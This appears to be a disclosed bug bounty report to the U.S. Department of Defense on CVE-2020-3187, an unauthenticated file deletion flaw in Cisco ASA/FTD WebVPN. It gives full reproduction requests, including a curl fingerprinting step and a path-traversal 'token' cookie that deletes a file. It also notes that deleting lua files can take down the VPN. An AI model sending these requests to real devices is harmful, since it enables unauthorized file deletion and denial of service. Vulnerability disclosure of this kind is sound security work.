U.S. Dept Of Defense: Unauthenticated Arbitrary File Deletion "CVE-2020-3187" in █████

Summary:

A vulnerability in the interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and obtain read and delete access to sensitive files.

Description:

Vulnerable host:
██████████

Impact

An exploit could allow the attacker to view or delete arbitrary files on the system.

Step-by-step Reproduction Instructions

1.Identifying vulnerable host by send request to /+CSCOE+/session_password.html.

curl -skiL “███/+CSCOE+/session_password.html”

GET /+CSCOE+/session_password.html HTTP/1.1
Host: ███████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1

If the target is vulnerable, the response header will display webvpn header, like:
The request gave me the following response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:40:44 GMT
X-Frame-Options: SAMEORIGIN
webvpn:

2.Perform exploits to delete files by adding token in cookie header request.

For example, I wanted to delete this (██████/+CSCOU+/csco_logo.gif) file.
That did not work because sometimes logo.gif/png has permission issues so try this “█████/+CSCOE+/blank.html”

You can also delete the file “/+CSCOE+/blank.html” (an empty HTML file), as it might be a problem with the permission of the custom logo file sometimes logo.gif has permission issue so we might not be able to delete but we can delete other files

Request:

Host: ██████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,ar;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: webvpnlogin=1; webvpnLang=en
Upgrade-Insecure-Requests: 1```

Response:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:54:48 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 13
<HTML></HTML>

**3. So I exploited the CVE and deleted the blank file. As following:**

Request:

GET /+CSCOE+/session_password.html HTTP/1.1
Host: █████████
Cookie: token=…/+CSCOE+/blank.html
User-Agent: curl/7.47.0
Accept: /

Response:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 0
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Wed, 04 Nov 2020 21:55:02 GMT
X-Frame-Options: SAMEORIGIN
webvpn:

File deleted successfully:

`curl -Ik ████/+CSCOE+/blank.html`

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Connection: Close
Date: Wed, 04 Nov 2020 21:55:08 GMT
X-Frame-Options: SAMEORIGIN

File not found

Warning : This can lead to a denial of service (DOS) on the VPN by deleting the lua source code files from the file system, which will break the WebVPN interface until the device is rebooted.

## Suggested Mitigation/Remediation Actions

Upgrade the ASA software version per the referenced advisory. This advisory is available at the following link:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-path-JE3azWw43

## Impact

*High - This vulnerability allows the attacker to delete files within the web services file system.*